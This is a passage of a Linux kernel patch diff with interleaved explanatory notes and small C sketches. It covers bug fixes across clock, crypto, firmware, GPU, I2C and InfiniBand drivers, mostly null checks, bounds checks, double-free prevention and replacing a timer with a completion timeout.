+ 		tmp_info.media_flags |= MEDIA_CHANGED_FLAG;
+ 
+ 	tmp_info.last_media_change = cdi->last_media_change_ms;
+diff --git a/drivers/clk/mediatek/clk-mt8183-mfgcfg.c b/drivers/clk/mediatek/clk-mt8183-mfgcfg.c
+index 730c9ae5ea124..50ccd59794464 100644
+--- a/drivers/clk/mediatek/clk-mt8183-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8183-mfgcfg.c
+@@ -29,6 +29,7 @@ static const struct mtk_gate mfg_clks[] = {
+ static const struct mtk_clk_desc mfg_desc = {
+ 	.clks = mfg_clks,
+ 	.num_clks = ARRAY_SIZE(mfg_clks),
++	.need_runtime_pm = true,
+ };
+ 
+ static const struct of_device_id of_match_clk_mt8183_mfg[] = {
+diff --git a/drivers/clk/mediatek/clk-mtk.c b/drivers/clk/mediatek/clk-mtk.c
+index fa2c1b1c7dee4..9dbfc11d5c591 100644
+--- a/drivers/clk/mediatek/clk-mtk.c
++++ b/drivers/clk/mediatek/clk-mtk.c
+@@ -472,14 +472,16 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 	}
+ 
+ 
+-	devm_pm_runtime_enable(&pdev->dev);
+-	/*
+-	 * Do a pm_runtime_resume_and_get() to workaround a possible
+-	 * deadlock between clk_register() and the genpd framework.
+-	 */
+-	r = pm_runtime_resume_and_get(&pdev->dev);
+-	if (r)
+-		return r;
++	if (mcd->need_runtime_pm) {
++		devm_pm_runtime_enable(&pdev->dev);
++		/*
++		 * Do a pm_runtime_resume_and_get() to workaround a possible
++		 * deadlock between clk_register() and the genpd framework.
++		 */
++		r = pm_runtime_resume_and_get(&pdev->dev);
++		if (r)
++			return r;
++	}
+ 
+ 	/* Calculate how many clk_hw_onecell_data entries to allocate */
+ 	num_clks = mcd->num_clks + mcd->num_composite_clks;
+@@ -529,6 +531,14 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 			goto unregister_composites;
+ 	}
+ 
++	if (mcd->clk_notifier_func) {
++		struct clk *mfg_mux = clk_data->hws[mcd->mfg_clk_idx]->clk;
++
++		r = mcd->clk_notifier_func(&pdev->dev, mfg_mux);
++		if (r)
++			goto unregister_clks;
++	}
++
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		goto unregister_clks;
+@@ -542,7 +552,8 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 			goto unregister_clks;
+ 	}
+ 
+-	pm_runtime_put(&pdev->dev);
++	if (mcd->need_runtime_pm)
++		pm_runtime_put(&pdev->dev);
+ 
+ 	return r;
+ 
+@@ -570,7 +581,8 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 	if (mcd->shared_io && base)
+ 		iounmap(base);
+ 
+-	pm_runtime_put(&pdev->dev);
++	if (mcd->need_runtime_pm)
++		pm_runtime_put(&pdev->dev);
+ 	return r;
+ }
+ EXPORT_SYMBOL_GPL(mtk_clk_simple_probe);
+diff --git a/drivers/clk/mediatek/clk-mtk.h b/drivers/clk/mediatek/clk-mtk.h
+index 880b3d6d80119..65c24ab6c9470 100644
+--- a/drivers/clk/mediatek/clk-mtk.h
++++ b/drivers/clk/mediatek/clk-mtk.h
+@@ -207,6 +207,11 @@ struct mtk_clk_desc {
+ 	const struct mtk_clk_rst_desc *rst_desc;
+ 	spinlock_t *clk_lock;
+ 	bool shared_io;
++
++	int (*clk_notifier_func)(struct device *dev, struct clk *clk);
++	unsigned int mfg_clk_idx;
++
++	bool need_runtime_pm;
+ };
+ 
+ int mtk_clk_simple_probe(struct platform_device *pdev);
+diff --git a/drivers/clk/qcom/gcc-sm6350.c b/drivers/clk/qcom/gcc-sm6350.c
+index cf4a7b6e0b23a..0559a33faf00e 100644
+--- a/drivers/clk/qcom/gcc-sm6350.c
++++ b/drivers/clk/qcom/gcc-sm6350.c
+@@ -100,8 +100,8 @@ static struct clk_alpha_pll gpll6 = {
+ 		.enable_mask = BIT(6),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpll6",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&gpll0.clkr.hw,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+ 			.ops = &clk_alpha_pll_fixed_fabia_ops,
+@@ -124,7 +124,7 @@ static struct clk_alpha_pll_postdiv gpll6_out_even = {
+ 	.clkr.hw.init = &(struct clk_init_data){
+ 		.name = "gpll6_out_even",
+ 		.parent_hws = (const struct clk_hw*[]){
+-			&gpll0.clkr.hw,
++			&gpll6.clkr.hw,
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_fabia_ops,
+@@ -139,8 +139,8 @@ static struct clk_alpha_pll gpll7 = {
+ 		.enable_mask = BIT(7),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpll7",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&gpll0.clkr.hw,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+ 			.ops = &clk_alpha_pll_fixed_fabia_ops,
+diff --git a/drivers/crypto/hisilicon/debugfs.c b/drivers/crypto/hisilicon/debugfs.c
+index 13bec8b2d7237..a1d41ee39816b 100644
+--- a/drivers/crypto/hisilicon/debugfs.c
++++ b/drivers/crypto/hisilicon/debugfs.c
+@@ -744,8 +744,14 @@ static void dfx_regs_uninit(struct hisi_qm *qm,
+ {
+ 	int i;
+ 
++	if (!dregs)
++		return;
++
+ 	/* Set the pointer to NULL to prevent double free */
+ 	for (i = 0; i < reg_len; i++) {
++		if (!dregs[i].regs)
++			continue;
++
+ 		kfree(dregs[i].regs);
+ 		dregs[i].regs = NULL;
+ 	}
+@@ -795,14 +801,21 @@ static struct dfx_diff_registers *dfx_regs_init(struct hisi_qm *qm,
+ static int qm_diff_regs_init(struct hisi_qm *qm,
+ 		struct dfx_diff_registers *dregs, u32 reg_len)
+ {
++	int ret;
++
+ 	qm->debug.qm_diff_regs = dfx_regs_init(qm, qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
+-	if (IS_ERR(qm->debug.qm_diff_regs))
+-		return PTR_ERR(qm->debug.qm_diff_regs);
++	if (IS_ERR(qm->debug.qm_diff_regs)) {
++		ret = PTR_ERR(qm->debug.qm_diff_regs);
++		qm->debug.qm_diff_regs = NULL;
++		return ret;
++	}
+ 
+ 	qm->debug.acc_diff_regs = dfx_regs_init(qm, dregs, reg_len);
+ 	if (IS_ERR(qm->debug.acc_diff_regs)) {
+ 		dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
+-		return PTR_ERR(qm->debug.acc_diff_regs);
++		ret = PTR_ERR(qm->debug.acc_diff_regs);
++		qm->debug.acc_diff_regs = NULL;
++		return ret;
+ 	}
+ 
+ 	return 0;
+@@ -843,7 +856,9 @@ static int qm_last_regs_init(struct hisi_qm *qm)
+ static void qm_diff_regs_uninit(struct hisi_qm *qm, u32 reg_len)
+ {
+ 	dfx_regs_uninit(qm, qm->debug.acc_diff_regs, reg_len);
++	qm->debug.acc_diff_regs = NULL;
+ 	dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++	qm->debug.qm_diff_regs = NULL;
+ }
+ 
+ /**
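
Both the init error paths and the uninit path above now leave stale pointers NULLed. A generic sketch of the idiom, with a hypothetical struct name:

#include <linux/slab.h>

struct foo { void *regs; };	/* hypothetical */

/* Sketch: free, then clear, and tolerate NULL on entry. Together these
 * make a second uninit call (for example from an error path that
 * already ran partial cleanup) a no-op instead of a double free.
 */
static void foo_uninit(struct foo **pfoo)
{
	if (!*pfoo)
		return;
	kfree((*pfoo)->regs);
	(*pfoo)->regs = NULL;
	kfree(*pfoo);
	*pfoo = NULL;
}
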
+diff --git a/drivers/firmware/dmi_scan.c b/drivers/firmware/dmi_scan.c
+index 015c95a825d31..ac2a5d2d47463 100644
+--- a/drivers/firmware/dmi_scan.c
++++ b/drivers/firmware/dmi_scan.c
+@@ -101,6 +101,17 @@ static void dmi_decode_table(u8 *buf,
+ 	       (data - buf + sizeof(struct dmi_header)) <= dmi_len) {
+ 		const struct dmi_header *dm = (const struct dmi_header *)data;
+ 
++		/*
++		 * If a short entry is found (less than 4 bytes), not only is
++		 * it invalid, but we cannot reliably locate the next entry.
++		 */
++		if (dm->length < sizeof(struct dmi_header)) {
++			pr_warn(FW_BUG
++				"Corrupted DMI table, offset %zd (only %d entries processed)\n",
++				data - buf, i);
++			break;
++		}
++
+ 		/*
+ 		 *  We want to know the total length (formatted area and
+ 		 *  strings) before decoding to make sure we won't run off the
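
The dmi_scan fix stops parsing as soon as an entry header claims a length shorter than the header itself, because the offset of the next entry is computed from that length and would be garbage. A hedged sketch of the guarded walk (struct layout per the SMBIOS header; error reporting elided):

#include <linux/types.h>

struct dmi_header {
	u8 type;
	u8 length;	/* length of the formatted area, header included */
	u16 handle;
} __packed;

/* Sketch: each entry is a formatted area of dm->length bytes followed
 * by strings terminated by a double NUL. A short entry cannot be
 * stepped over reliably, so parsing must stop there.
 */
static void walk_table(const u8 *buf, u32 len)
{
	const u8 *data = buf;

	while (data - buf + sizeof(struct dmi_header) <= len) {
		const struct dmi_header *dm = (const void *)data;

		if (dm->length < sizeof(struct dmi_header))
			break;	/* corrupted table */

		/* ... decode the entry at dm here ... */

		data += dm->length;		/* skip formatted area */
		while (data - buf < len - 1 && (data[0] || data[1]))
			data++;			/* find the double NUL */
		data += 2;
	}
}
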
+diff --git a/drivers/gpu/drm/amd/amdgpu/aldebaran.c b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+index fa6193535d485..7fea4f0f495a3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/aldebaran.c
++++ b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+@@ -100,7 +100,7 @@ static int aldebaran_mode2_suspend_ip(struct amdgpu_device *adev)
+ 		adev->ip_blocks[i].status.hw = false;
+ 	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index b803e785d3aff..e9e0e7328c4e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -1004,7 +1004,8 @@ void amdgpu_gfx_cp_init_microcode(struct amdgpu_device *adev,
+ 		fw_size = le32_to_cpu(cp_hdr_v2_0->data_size_bytes);
+ 		break;
+ 	default:
+-		break;
++		dev_err(adev->dev, "Invalid ucode id %u\n", ucode_id);
++		return;
+ 	}
+ 
+ 	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index 9efbc0f7c6bdf..c3da333f09de4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -480,6 +480,14 @@ void amdgpu_irq_dispatch(struct amdgpu_device *adev,
+ 
+ 	entry.ih = ih;
+ 	entry.iv_entry = (const uint32_t *)&ih->ring[ring_index];
++
++	/*
++	 * timestamp is not supported on some legacy SOCs (cik, cz, iceland,
++	 * si and tonga), so initialize timestamp and timestamp_src to 0
++	 */
++	entry.timestamp = 0;
++	entry.timestamp_src = 0;
++
+ 	amdgpu_ih_decode_iv(adev, &entry);
+ 
+ 	trace_amdgpu_iv(ih - &adev->irq.ih, &entry);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c b/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c
+index 81a6d5b94987f..1311e72486fdc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c
++++ b/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c
+@@ -93,7 +93,7 @@ static int sienna_cichlid_mode2_suspend_ip(struct amdgpu_device *adev)
+ 		adev->ip_blocks[i].status.hw = false;
+ 	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index e2f80cd0ca8cb..83898e46bcadf 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -2146,6 +2146,9 @@ static struct audio *find_first_free_audio(
+ {
+ 	int i, available_audio_count;
+ 
++	if (id == ENGINE_ID_UNKNOWN)
++		return NULL;
++
+ 	available_audio_count = pool->audio_count;
+ 
+ 	for (i = 0; i < available_audio_count; i++) {
+diff --git a/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c b/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c
+index 44649db5f3e32..5646b7788f02e 100644
+--- a/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c
++++ b/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c
+@@ -211,8 +211,12 @@ bool dce110_vblank_set(struct irq_service *irq_service,
+ 						   info->ext_id);
+ 	uint8_t pipe_offset = dal_irq_src - IRQ_TYPE_VBLANK;
+ 
+-	struct timing_generator *tg =
+-			dc->current_state->res_ctx.pipe_ctx[pipe_offset].stream_res.tg;
++	struct timing_generator *tg;
++
++	if (pipe_offset >= MAX_PIPES)
++		return false;
++
++	tg = dc->current_state->res_ctx.pipe_ctx[pipe_offset].stream_res.tg;
+ 
+ 	if (enable) {
+ 		if (!tg || !tg->funcs->arm_vert_intr(tg, 2)) {
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+index f7b5583ee609a..8e9caae7c9559 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+@@ -156,6 +156,10 @@ static enum mod_hdcp_status read(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++		return MOD_HDCP_STATUS_DDC_FAILURE;
++	}
++
+ 	if (is_dp_hdcp(hdcp)) {
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+@@ -215,6 +219,10 @@ static enum mod_hdcp_status write(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++		return MOD_HDCP_STATUS_DDC_FAILURE;
++	}
++
+ 	if (is_dp_hdcp(hdcp)) {
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index e2207f1c5bad3..6ea596a8a03df 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -701,7 +701,7 @@ struct atom_gpio_pin_lut_v2_1
+ {
+   struct  atom_common_table_header  table_header;
+   /*the real number of entries included in the structure is calculated by using the (whole structure size - the header size)/size of atom_gpio_pin_lut  */
+-  struct  atom_gpio_pin_assignment  gpio_pin[8];
++  struct  atom_gpio_pin_assignment  gpio_pin[];
+ };
+ 
+ 
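
Replacing the fixed gpio_pin[8] with a C99 flexible array member removes a bound the in-tree comment already says is wrong: the real count comes from the table size. A sketch of recovering it (field names per atomfirmware.h; endianness handling elided):

/* Sketch: with a flexible array member, sizeof() covers only the fixed
 * part, so the entry count is derived from the size recorded in the
 * table header, exactly as the comment above describes.
 */
static unsigned int gpio_pin_count(const struct atom_gpio_pin_lut_v2_1 *lut)
{
	return (lut->table_header.structuresize -
		sizeof(struct atom_common_table_header)) /
	       sizeof(struct atom_gpio_pin_assignment);
}
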
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index aa93129c3397e..426bbee2d9f5e 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -421,6 +421,13 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "1"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* Valve Steam Deck */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Valve"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Galileo"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "1"),
++		},
++		.driver_data = (void *)&lcd800x1280_rightside_up,
+ 	}, {	/* VIOS LTH17 */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "VIOS"),
+diff --git a/drivers/gpu/drm/lima/lima_gp.c b/drivers/gpu/drm/lima/lima_gp.c
+index 6cf46b653e810..ca3842f719842 100644
+--- a/drivers/gpu/drm/lima/lima_gp.c
++++ b/drivers/gpu/drm/lima/lima_gp.c
+@@ -324,7 +324,9 @@ int lima_gp_init(struct lima_ip *ip)
+ 
+ void lima_gp_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ int lima_gp_pipe_init(struct lima_device *dev)
+diff --git a/drivers/gpu/drm/lima/lima_mmu.c b/drivers/gpu/drm/lima/lima_mmu.c
+index a1ae6c252dc2b..8ca7047adbaca 100644
+--- a/drivers/gpu/drm/lima/lima_mmu.c
++++ b/drivers/gpu/drm/lima/lima_mmu.c
+@@ -118,7 +118,12 @@ int lima_mmu_init(struct lima_ip *ip)
+ 
+ void lima_mmu_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
++
++	if (ip->id == lima_ip_ppmmu_bcast)
++		return;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ void lima_mmu_flush_tlb(struct lima_ip *ip)
+diff --git a/drivers/gpu/drm/lima/lima_pp.c b/drivers/gpu/drm/lima/lima_pp.c
+index 54b208a4a768e..d34c9e8840f45 100644
+--- a/drivers/gpu/drm/lima/lima_pp.c
++++ b/drivers/gpu/drm/lima/lima_pp.c
+@@ -266,7 +266,9 @@ int lima_pp_init(struct lima_ip *ip)
+ 
+ void lima_pp_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ int lima_pp_bcast_resume(struct lima_ip *ip)
+@@ -299,7 +301,9 @@ int lima_pp_bcast_init(struct lima_ip *ip)
+ 
+ void lima_pp_bcast_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ static int lima_pp_task_validate(struct lima_sched_pipe *pipe,
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index d6dd79541f6a9..bdf5262ebd35e 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -980,6 +980,9 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 		struct drm_display_mode *mode;
+ 
+ 		mode = drm_mode_duplicate(dev, nv_connector->native_mode);
++		if (!mode)
++			return 0;
++
+ 		drm_mode_probed_add(connector, mode);
+ 		ret = 1;
+ 	}
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 1c970842624ba..208c7741bc681 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -1057,7 +1057,7 @@ static const struct pci_device_id i801_ids[] = {
+ MODULE_DEVICE_TABLE(pci, i801_ids);
+ 
+ #if defined CONFIG_X86 && defined CONFIG_DMI
+-static unsigned char apanel_addr;
++static unsigned char apanel_addr __ro_after_init;
+ 
+ /* Scan the system ROM for the signature "FJKEYINF" */
+ static __init const void __iomem *bios_signature(const void __iomem *bios)
+diff --git a/drivers/i2c/busses/i2c-pnx.c b/drivers/i2c/busses/i2c-pnx.c
+index 50f21cdbe90d3..d2c09b0fdf527 100644
+--- a/drivers/i2c/busses/i2c-pnx.c
++++ b/drivers/i2c/busses/i2c-pnx.c
+@@ -15,7 +15,6 @@
+ #include <linux/ioport.h>
+ #include <linux/delay.h>
+ #include <linux/i2c.h>
+-#include <linux/timer.h>
+ #include <linux/completion.h>
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
+@@ -32,7 +31,6 @@ struct i2c_pnx_mif {
+ 	int			ret;		/* Return value */
+ 	int			mode;		/* Interface mode */
+ 	struct completion	complete;	/* I/O completion */
+-	struct timer_list	timer;		/* Timeout */
+ 	u8 *			buf;		/* Data buffer */
+ 	int			len;		/* Length of data buffer */
+ 	int			order;		/* RX Bytes to order via TX */
+@@ -117,24 +115,6 @@ static inline int wait_reset(struct i2c_pnx_algo_data *data)
+ 	return (timeout <= 0);
+ }
+ 
+-static inline void i2c_pnx_arm_timer(struct i2c_pnx_algo_data *alg_data)
+-{
+-	struct timer_list *timer = &alg_data->mif.timer;
+-	unsigned long expires = msecs_to_jiffies(alg_data->timeout);
+-
+-	if (expires <= 1)
+-		expires = 2;
+-
+-	del_timer_sync(timer);
+-
+-	dev_dbg(&alg_data->adapter.dev, "Timer armed at %lu plus %lu jiffies.\n",
+-		jiffies, expires);
+-
+-	timer->expires = jiffies + expires;
+-
+-	add_timer(timer);
+-}
+-
+ /**
+  * i2c_pnx_start - start a device
+  * @slave_addr:		slave address
+@@ -259,8 +239,6 @@ static int i2c_pnx_master_xmit(struct i2c_pnx_algo_data *alg_data)
+ 				~(mcntrl_afie | mcntrl_naie | mcntrl_drmie),
+ 				  I2C_REG_CTL(alg_data));
+ 
+-			del_timer_sync(&alg_data->mif.timer);
+-
+ 			dev_dbg(&alg_data->adapter.dev,
+ 				"%s(): Waking up xfer routine.\n",
+ 				__func__);
+@@ -276,8 +254,6 @@ static int i2c_pnx_master_xmit(struct i2c_pnx_algo_data *alg_data)
+ 			~(mcntrl_afie | mcntrl_naie | mcntrl_drmie),
+ 			  I2C_REG_CTL(alg_data));
+ 
+-		/* Stop timer. */
+-		del_timer_sync(&alg_data->mif.timer);
+ 		dev_dbg(&alg_data->adapter.dev,
+ 			"%s(): Waking up xfer routine after zero-xfer.\n",
+ 			__func__);
+@@ -364,8 +340,6 @@ static int i2c_pnx_master_rcv(struct i2c_pnx_algo_data *alg_data)
+ 				 mcntrl_drmie | mcntrl_daie);
+ 			iowrite32(ctl, I2C_REG_CTL(alg_data));
+ 
+-			/* Kill timer. */
+-			del_timer_sync(&alg_data->mif.timer);
+ 			complete(&alg_data->mif.complete);
+ 		}
+ 	}
+@@ -400,8 +374,6 @@ static irqreturn_t i2c_pnx_interrupt(int irq, void *dev_id)
+ 			 mcntrl_drmie);
+ 		iowrite32(ctl, I2C_REG_CTL(alg_data));
+ 
+-		/* Stop timer, to prevent timeout. */
+-		del_timer_sync(&alg_data->mif.timer);
+ 		complete(&alg_data->mif.complete);
+ 	} else if (stat & mstatus_nai) {
+ 		/* Slave did not acknowledge, generate a STOP */
+@@ -419,8 +391,6 @@ static irqreturn_t i2c_pnx_interrupt(int irq, void *dev_id)
+ 		/* Our return value. */
+ 		alg_data->mif.ret = -EIO;
+ 
+-		/* Stop timer, to prevent timeout. */
+-		del_timer_sync(&alg_data->mif.timer);
+ 		complete(&alg_data->mif.complete);
+ 	} else {
+ 		/*
+@@ -453,9 +423,8 @@ static irqreturn_t i2c_pnx_interrupt(int irq, void *dev_id)
+ 	return IRQ_HANDLED;
+ }
+ 
+-static void i2c_pnx_timeout(struct timer_list *t)
++static void i2c_pnx_timeout(struct i2c_pnx_algo_data *alg_data)
+ {
+-	struct i2c_pnx_algo_data *alg_data = from_timer(alg_data, t, mif.timer);
+ 	u32 ctl;
+ 
+ 	dev_err(&alg_data->adapter.dev,
+@@ -472,7 +441,6 @@ static void i2c_pnx_timeout(struct timer_list *t)
+ 	iowrite32(ctl, I2C_REG_CTL(alg_data));
+ 	wait_reset(alg_data);
+ 	alg_data->mif.ret = -EIO;
+-	complete(&alg_data->mif.complete);
+ }
+ 
+ static inline void bus_reset_if_active(struct i2c_pnx_algo_data *alg_data)
+@@ -514,6 +482,7 @@ i2c_pnx_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 	struct i2c_msg *pmsg;
+ 	int rc = 0, completed = 0, i;
+ 	struct i2c_pnx_algo_data *alg_data = adap->algo_data;
++	unsigned long time_left;
+ 	u32 stat;
+ 
+ 	dev_dbg(&alg_data->adapter.dev,
+@@ -548,7 +517,6 @@ i2c_pnx_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 		dev_dbg(&alg_data->adapter.dev, "%s(): mode %d, %d bytes\n",
+ 			__func__, alg_data->mif.mode, alg_data->mif.len);
+ 
+-		i2c_pnx_arm_timer(alg_data);
+ 
+ 		/* initialize the completion var */
+ 		init_completion(&alg_data->mif.complete);
+@@ -564,7 +532,10 @@ i2c_pnx_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 			break;
+ 
+ 		/* Wait for completion */
+-		wait_for_completion(&alg_data->mif.complete);
++		time_left = wait_for_completion_timeout(&alg_data->mif.complete,
++							alg_data->timeout);
++		if (time_left == 0)
++			i2c_pnx_timeout(alg_data);
+ 
+ 		if (!(rc = alg_data->mif.ret))
+ 			completed++;
+@@ -657,7 +628,10 @@ static int i2c_pnx_probe(struct platform_device *pdev)
+ 	alg_data->adapter.algo_data = alg_data;
+ 	alg_data->adapter.nr = pdev->id;
+ 
+-	alg_data->timeout = I2C_PNX_TIMEOUT_DEFAULT;
++	alg_data->timeout = msecs_to_jiffies(I2C_PNX_TIMEOUT_DEFAULT);
++	if (alg_data->timeout <= 1)
++		alg_data->timeout = 2;
++
+ #ifdef CONFIG_OF
+ 	alg_data->adapter.dev.of_node = of_node_get(pdev->dev.of_node);
+ 	if (pdev->dev.of_node) {
+@@ -677,8 +651,6 @@ static int i2c_pnx_probe(struct platform_device *pdev)
+ 	if (IS_ERR(alg_data->clk))
+ 		return PTR_ERR(alg_data->clk);
+ 
+-	timer_setup(&alg_data->mif.timer, i2c_pnx_timeout, 0);
+-
+ 	snprintf(alg_data->adapter.name, sizeof(alg_data->adapter.name),
+ 		 "%s", pdev->name);
+ 
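
The i2c-pnx rework above deletes a side-band watchdog timer whose handler competed with the IRQ path and instead bounds the wait itself; on expiry, recovery now runs synchronously in the caller, and the jiffies conversion is clamped once at probe. A minimal sketch of the pattern, under illustrative names:

#include <linux/completion.h>
#include <linux/jiffies.h>

/* Sketch: wait on the completion with a timeout rather than arming a
 * timer that races with the interrupt handler. The IRQ handler only
 * calls complete(); the caller owns the timeout path.
 */
static int xfer_and_wait(struct completion *done, unsigned long timeout_jiffies)
{
	unsigned long time_left;

	reinit_completion(done);
	/* ... start the transfer; the IRQ handler calls complete(done) ... */

	time_left = wait_for_completion_timeout(done, timeout_jiffies);
	if (time_left == 0) {
		/* reset the controller, record the error, etc. */
		return -EIO;
	}
	return 0;
}
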
+diff --git a/drivers/infiniband/core/user_mad.c b/drivers/infiniband/core/user_mad.c
+index 5c284dfbe6923..66a0c5a73b832 100644
+--- a/drivers/infiniband/core/user_mad.c
++++ b/drivers/infiniband/core/user_mad.c
+@@ -63,6 +63,8 @@ MODULE_AUTHOR("Roland Dreier");
+ MODULE_DESCRIPTION("InfiniBand userspace MAD packet access");
+ MODULE_LICENSE("Dual BSD/GPL");
+ 
++#define MAX_UMAD_RECV_LIST_SIZE 200000
++
+ enum {
+ 	IB_UMAD_MAX_PORTS  = RDMA_MAX_PORTS,
+ 	IB_UMAD_MAX_AGENTS = 32,
+@@ -113,6 +115,7 @@ struct ib_umad_file {
+ 	struct mutex		mutex;
+ 	struct ib_umad_port    *port;
+ 	struct list_head	recv_list;
++	atomic_t		recv_list_size;
+ 	struct list_head	send_list;
+ 	struct list_head	port_list;
+ 	spinlock_t		send_lock;
+@@ -180,24 +183,28 @@ static struct ib_mad_agent *__get_agent(struct ib_umad_file *file, int id)
+ 	return file->agents_dead ? NULL : file->agent[id];
+ }
+ 
+-static int queue_packet(struct ib_umad_file *file,
+-			struct ib_mad_agent *agent,
+-			struct ib_umad_packet *packet)
++static int queue_packet(struct ib_umad_file *file, struct ib_mad_agent *agent,
++			struct ib_umad_packet *packet, bool is_recv_mad)
+ {
+ 	int ret = 1;
+ 
+ 	mutex_lock(&file->mutex);
+ 
++	if (is_recv_mad &&
++	    atomic_read(&file->recv_list_size) > MAX_UMAD_RECV_LIST_SIZE)
++		goto unlock;
++
+ 	for (packet->mad.hdr.id = 0;
+ 	     packet->mad.hdr.id < IB_UMAD_MAX_AGENTS;
+ 	     packet->mad.hdr.id++)
+ 		if (agent == __get_agent(file, packet->mad.hdr.id)) {
+ 			list_add_tail(&packet->list, &file->recv_list);
++			atomic_inc(&file->recv_list_size);
+ 			wake_up_interruptible(&file->recv_wait);
+ 			ret = 0;
+ 			break;
+ 		}
+-
++unlock:
